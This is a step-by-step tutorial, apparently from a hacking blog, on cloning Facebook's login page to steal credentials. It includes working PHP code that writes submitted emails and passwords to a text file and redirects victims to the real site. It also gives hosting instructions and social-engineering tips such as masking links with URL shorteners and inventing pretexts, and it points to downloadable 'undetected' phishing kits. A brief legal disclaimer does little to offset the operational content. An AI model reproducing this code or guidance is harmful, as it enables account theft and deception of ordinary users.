How to hack Facebook by creating a custom Phishing page

Hello and welcome to another Facebook hacking tutorial. This time I will be showing you how to manually create a phishing page and hack Facebook with phishing and social engineering.

I will show two methods one is the easy one for beginners who want to just test the hack and the second one is for those wanting to learn hacking and pentesting and create their custom Facebook phishing page.

A phishing attack is the attack method used by hackers in which they create a copy of the original site which is exactly the same as the original website. Then by using social engineering and creativity, they send the phishing link to people to sign in. Once someone signs in their credentials. Hackers can easily get the username and password of the victim in text format.

So in this tutorial, I’m going to explain both the easy and the technical way of hacking facebook with a custom phishing page.

Easy method for hacking facebook:

• Download the hack files: For mobile and for desktop (prefer desktop since they are undetected)
• Free hosting: 000webhost
• You can actually use any hosting but I would suggest this since its that’s what I will be using for this tutorial.

Steps to create a Fake Facebook phishing page :

Step 1: Visit the 000webhost website and click on SignUp for FREE using any email. It’s very important to Verify your Email via the validation message you receive for your account to be active.

Step 2: Now register using your Email id, set a password and select a website name which is good for your phishing.

Step 3: After verification of your Email Address, click on File Manager and then click on Upload files Now as shown in the image below:

Step 4: Now you will be redirected to the actual File Manager of your website which is as shown below:

Step 5: You will start at the public_html Folder, which is exactly where you want to be. Upload both the files downloaded index.html and post.php depending on whether you want to hack mobile or desktop version of facebook.

Step 6: Click on upload icon in the Right corner of the File Manager as shown in the image below.

Step 7: Now select both the files index.htm and post.php and click on the upload button as shown in the image below:

Step 8: Navigate to Website list in the panel and copy your Website link address which you previously created. “The domain that was created by the hosting”

Mobile Facebook Phishing page:

Desktop facebook phishing page:

Step 9:Once the target logins to the website you will see the following file called username.txt in the file manager as shown below:

Step 10: Open the file to see the email id and password of the account.

Here I used: sas and sas as my facebook email and facebook password.

Viola, you have successfully hacked facebook account using phishing.

Now for those willing to learn let’s learn the technical details of hacking facebook manually here is the advanced version where you make your files.

Advanced method: making your custom facebook phishing page manually.

Step 1: Open facebook.com

To create a phishing page, go to the Facebook.com and then right-click on the blank area. You will see many options you need to click on the view source page option. As you can see below in the image.

Step 2: Create a local copy of the facebook page for making the phishing page

When you click on view page source a new tab will open as shown below showing all bunch of code. This is the source code of the facebook page. You are going to edit it so that you can use it to make a facebook phishing page. To do that:

Select all code and copy all code and paste it into notepad and save the file as index.htm. The file extension is .htm not .html do not make this mistake.

Facebook page source

Copied facebook source code for phishing in notepad

Step 3: Edit the source code

Now open notepad in which you have pasted this code and press CTRL+F and type ACTION in the search bar. This is a little tricky but you have to find the following line in the code.

action="https://www.facebook.com/login.php?login_attempt=1&lwv=110"

When you find the code similar to the code I mentioned above, delete all the text code in front of the word action and replace it with the word post.php as shown below:

Then the final code will look like this:

 action="post.php"

Facebook page source edited for phishing

Step 4: Save the files

Now if you haven’t already saved it, then save it to a new folder with the name index.htm Now you have completed part one of the phishing page.

Step 5: Creating the PHP file

To create the second part of facebook phishing page you need to create a PHP file. I am naming my file as post.php since that is what I edited in the source code in part one. If you plan on using a different name make sure to change it in index.htm as well.

Open a new notepad file and copy the code given below and save it with the name post.php. You can refer the images below for reference:

<?php
header (‘Location:http://www.facebook.com/’);
$handle = fopen(“usernames.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “\r\n”);
fclose($handle);
exit;
?>

Step 6: Copy the facebook phishing files together

Now, You have successfully created two files which should be saved in the same folder.

• index.htm
• post.php

Step 7: Create an account free hosting web account

Visit the 000webhost website and click on SignUp for FREE using any email. It’s very important to Verify your Email via the validation message you receive for your account to be active.

Step 8: Open file manager and Upload the files

Now open Cpanel (control panel) on the dashboard of your hosting. Open the file manager and then click on file manager go to public_html folder. By default, you should be in this folder

Step 9: Upload index.htm and post.php

Click on upload files button and upload both files you had previously saved as shown in the images below.

Step 10: Make sure all the files are uploaded. 

Make sure all the phishing files are uploaded and then open your website. You should see the original facebook page but when you see the URL you will know that it is a phishing page

Step 11: Navigate to Website list in the panel and copy your Website link address which you previously created.

Desktop facebook phishing page:

Step 12:Once the target logins to the website you will see the following file called username.txt in the file manager as shown below:

Step 13: Open the file to see the email id and password of the account.

Here I used: sas and sas as my facebook email and facebook password.

Viola, you have successfully hacked facebook account using phishing. This is your custom made phishing page for Facebook. Hope you liked it and it worked as expected.

Social engineering tricks hackers use to hack facebook:

1)When you are trying to send phishing link to the target victim, you need to use a URL shortener like TinyURL that will help mask the domain.

2) Choose a good domain which will be trusted by the target.

3) Be creative. A good pretext is needed so that the target will not suspect.

Commonly Asked Questions about hacking facebook with OSIF

Below are some of the questions which may come into your mind while trying to use this hack. If your question is not present then kindly mention it in the comment section.

Q1. Is this hacking tool legal to use on anyone?

No, you should not use this knowledge to hack people. If you use it to hack someone’s Facebook account, then it is considered as a criminal offence and you will responsible for any illegal actions you do. But you can use it for testing and gaining knowledge about how hackers hack facebook using phishing and other attacks.

Q2. Are there any alternatives to this method?

Yes, there are many methods to hack facebook account. The most famous is zshadow,shadowave, and anomor. You can also use Kali Linux to hack facebook by making a custom phishing page.

Q3. Are there any other ways other than phishing?

Bruteforce and tools such as facebook password extractor will work. You can also use usb stealer for hacking facebook accounts.

Q4. Its not working what do I do?

Make sure the file has .htm extension and not .html. Compare my files with yours. Try step by step. Mobile may or may not work since it might be easily detected.

Upload both files with proper names index.htm and post.php. If you have some unknown error comment them below.